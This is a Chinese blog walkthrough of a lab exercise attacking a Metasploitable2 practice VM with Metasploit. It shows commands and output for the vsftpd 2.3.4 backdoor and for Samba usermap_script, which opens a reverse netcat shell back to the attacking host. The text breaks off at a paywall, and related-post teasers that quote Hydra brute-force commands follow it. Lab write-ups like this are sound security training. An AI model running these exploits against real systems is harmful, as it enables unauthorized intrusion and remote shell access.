渗透测试MSTable2靶机实验

最新推荐文章于 2025-09-15 05:44:56 发布
原创 最新推荐文章于 2025-09-15 05:44:56 发布 · 4.1k 阅读 · 11 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#linux #信息安全 #kali linux #centos #数据库

本文详述了对MSTable2靶机的渗透测试过程,包括使用Kali Linux进行环境配置,利用nessus扫描漏洞,通过msfconsole工具执行vsftpd、httpd、Samba等漏洞的攻击,最终成功获取meterpreter会话,并利用UnrealIRCd漏洞尝试建立连接。

实验名称:渗透测试MSTable2靶机实验
实验目的:对MSTable2进行渗透测试
实验环境:操作系统:Kali Linux虚拟机一台(4G)MSTable2靶机一台
实验步骤:
一、先配置好实验环境再进行漏洞扫描
1、先配置好MSTable2靶机,配置IP为192.168.22.10
在这里插入图片描述
先使用Kali nessus进行对MSTable2的扫描
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
用nessus先进行扫描着,再实行渗透
(二)启动msfonsole框架,进行扫描
┌──(root💀k)-[~]
└─# msfconsole 开启msfonsole工具
在这里插入图片描述
1、使用扫描工具
msf6 > db_nmap -A -T4 192.168.22.10
在这里插入图片描述
如果不能扫描成功,就进行添加
在这里插入图片描述
再打开一个终端,使用msfconsole框架
在这里插入图片描述
可能存在漏洞,使用search
msf6 > db_nmap -A -T4 192.168.22.10
在这里插入图片描述
漏洞实施漏洞攻击
Vsftpd漏洞攻击
msf6 > search vsftpd 2.3.4 进行查找
在这里插入图片描述
msf6 > use exploit/unix/ftp/vsftpd_234_backdoor 引用模块
[] No payload configured, defaulting to cmd/unix/interact
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set rhosts 192.168.22.10 设置攻击目标主机的靶机
rhosts => 192.168.22.10
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > run 执行
在这里插入图片描述
2、httpd基本鉴权重置密码攻击(可进行拒绝服务攻击)
在这里插入图片描述
在这里插入图片描述
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > use auxiliary/admin/http/intersil_pass_reset 引用模块
msf6 auxiliary(admin/http/intersil_pass_reset) > set rhosts 192.168.22.10
rhosts => 192.168.22.10 设置攻击目标靶机IP地址
msf6 auxiliary(admin/http/intersil_pass_reset) > run 执行
[] Running module against 192.168.22.10
[*] Auxiliary module execution completed
在这里插入图片描述
msf6 auxiliary(admin/http/intersil_pass_reset) > info 查看漏洞模块详细信息
在这里插入图片描述
3、httpd mod 协商文件名
在这里插入图片描述
在这里插入图片描述
4、利用Samba漏洞实现任意命令行
在这里插入图片描述
msf6 auxiliary(scanner/http/mod_negotiation_brute) > search Samba 3.0.20

Matching Modules

Name Disclosure Date Rank Check Description

0 exploit/multi/samba/usermap_script 2007-05-14 excellent No Samba “username map script” Command Execution

Interact with a module by name or index. For example info 0, use 0 or use exploit/multi/samba/usermap_script

msf6 auxiliary(scanner/http/mod_negotiation_brute) > use exploit/multi/samba/usermap_script
[*] No payload configured, defaulting to cmd/unix/reverse_netcat
msf6 exploit(multi/samba/usermap_script) > set rhosts 192.168.22.10
rhosts => 192.168.22.10
msf6 exploit(multi/samba/usermap_script) > run

[] Started reverse TCP handler on 192.168.22.100:4444
[] Command shell session 2 opened (192.168.22.100:4444 -> 192.168.22.10:40232) at 2021-02-02 15:02:17 +0800

ls
bin
boot
cdrom
dev
etc
home
initrd
initrd.img
lib
lost+found
media
mnt
nohup.out
opt
proc
root
sbin
srv
sys
tmp
usr
var
vmlinuz
exit

[*] 192.168.22.10 - Command shell session 2 closed.
在这里插入图片描述
5、升级shell会话为meterpreter会话
接上一个先Ctrl+Z把shell会话放在后台
^Z
Background session 1? [y/N] y
msf6 exploit(multi/samba/usermap_script)

最低0.47元/天 解锁文章
避坑版UnreallRCd后门漏洞复现
weixin_69925635的博客
07-17 1131
基于kali linux实现UnreallRCd后门,解决A payload has not been selected.Exploit completed,but no session was created.问题
metasploitable2 渗透测试靶机 1
m0_73910867的博客
10-11 2056
Metasploitable2 虚拟系统是一个特别制作的ubuntu操作系统,本身设计作为安全工具测试和演示常见漏洞攻击。这个版本的虚拟系统兼容VMware。当虚拟系统启动之后,使用用户名:msfadmin 和密码msfadmin登陆 适用于学习网络安全。
ipwndfu故障排除:DFU模式进入失败与exploit执行不稳定解决方案
最新发布
gitblog_01044的博客
09-15 880
你是否曾在使用ipwndfu进行iOS设备越狱时遇到以下问题:反复尝试仍无法进入DFU模式、exploit执行成功率低下、设备在操作过程中意外重启?这些问题不仅浪费时间,还可能导致越狱失败甚至设备损坏。本文将系统分析ipwndfu工具在实际使用中最常见的两类故障——DFU模式进入失败和exploit执行不稳定,并提供经过验证的解决方案。读完本文后,你将能够: - 掌握3种DFU模式强制进入方法,...
ctf:kali2:渗透Samba:exploit/multi/samba/usermap_script
viviliving的专栏
12-09 1535
从输出的信息中,可以看到成功的打开了一个会话。这表示已成功攻击了目标主机。此时用户可以执行一些Linux命令,查看目标主机的相关信息。从输出的信息中,可以看到当前目标系统登录的用户名是root。如果想了解该用户的详细信息,可以使用id命令查看。输出的信息表上root用户属于root组,并且其UID和GID都为0。whoami #查看当前登录系统的用户。id #查看当前登录用户的信息。
渗透测试实例--Metasploitable2靶机
lxy123_com的博客
02-01 5004
实验环境:Kali Linux虚拟机一台,4G运行,Metasploitable2靶机一台 实验目的: 实验步骤:
Metasploitable2靶机漏洞渗透测试
末班车的博客
03-11 2455
Metasploitable2靶机漏洞发现与渗透测试
web渗透测试靶机(新手)
05-07
Web渗透测试靶机是针对新手入门的网络安全学习平台,它模拟了实际的Web应用程序环境,让你可以在一个安全可控的环境中实践渗透测试技术。这个靶机通常包含一系列具有不同安全漏洞的Web应用,让学习者通过查找和利用...
新手适用的Web渗透测试靶机实践
06-17
Web渗透测试靶机是一种专为网络安全新手设计的学习平台,它模拟真实的Web应用程序环境,让学习者能够在安全可控的条件下练习渗透测试技术。这种靶机通常包含多种存在不同安全漏洞的Web应用,学习者可以通过查找和...
渗透测试 ( 2 ) --- 渗透测试系统、靶机、GoogleHacking、kali工具
墨鱼菜鸡
07-11 2786
操作系统:https://zhuanlan.zhihu.com/p/162865015 1、基于 Windows、Linux、Android 的渗透测试系统 1.1 基于 Linux 的系统 Kali:https://www.kali.org/get-kali/Parrot Security OS:Parrot Securitybackbox:ht...
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
MetaSploit渗透测试2-Metasploitable2-linux
2202_75658977的博客
03-19 1324
172.17.152.196 登录:msfadmin/msfadmin proot:sudo su root 密码:msfadmin。特定版本的vsftpd服务器程序中,被人恶意植入代码,当用户名以“:)“为结尾,服务器就会在6200端口监听,并且能够执行任意代码。Metasploitable2 它是一个特别制作的ubuntu操作系统,本身设计作为安全工具测试和演示常 见漏洞攻击。(3)在Windows使用ssh工具实现对靶机的ssh连接。使用exploit进行攻击攻击成功获取到靶机的权限。
Metasploitable2靶机渗透学习
热门推荐
m0_65712192的博客
05-19 1万+
Metasploitable2靶机渗透学习
二、VMware基础以及Metasploitable2搭建
谢小二的博客
06-03 1311
VMware、Metasploitable
Metasploitable2体验
Mikasa
05-17 755
引言 最近找到了这个靶机,于是开始进行这个游戏,希望借此提示自己的实战能力 1.主机发现 这个时候我们并没有得到主机的IP,需要我们利用工具去扫描出来,这里面用的是masscan(当然Nmap也是可以的,不过可能慢点) 扫描当前主机网段下的主机(通过探测22端口是否开启),然后将结果重定向到1.txt 查看结果 可以看到开放这个端口的IP,这就是我们接下来要进行测试的机器。 总结: massca...
靶机 Metasploitable2漏洞
Tom_to的博客
05-24 366
Metasploitable2虚拟系统是一个特别制作的ubuntu操作系统,本身设计目的是作为安全工具测试和演示常见漏洞攻击的环境。其中最重要的是可以用来作为MSF攻击用的靶机
metasploitable2靶场渗透
weixin_45349299的博客
02-13 558
title: metasploitable2靶场渗透 date: 2023-2-13 9 :16 :35 tags: vulhub categories: 渗透从入门到入土 author:Abyssaler
Metasploit 内网渗透一 ——基础环境配置、渗透过程中遇到的配置问题处理、kali中MSF基础命令
天下著书立传者,皆为我师
04-18 1540
Metasploitable2-linux:攻击机 192.168.234.8。kali-debian:攻击机 192.168.234.141。修改网卡后,需要重启网卡:service networking restart。win7 虚拟机:靶机 192.168.234.158。注:win7靶机需要关闭防火墙,kali才能ping通。同时还需要配置虚拟机网络。
手把手教你kali渗透Metasploitable
qq_41620273的博客
12-24 1万+
记一次kali渗透Metasploitbale靶机 1.网络设置 2.ifconfig查看Metasploitable的IP: 3.对Metasploitbale进行nmap端口扫描: Nmap 192.168.22.128 端口爆破:FTP、SSH等 工具:Hydra 备用字典:user.txt: pass,txt: 一、 爆破FTP hydra -L /root/桌面/user.txt -P /root/桌面/pass.txt [ftp://192.168.22.128](ftp://19
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值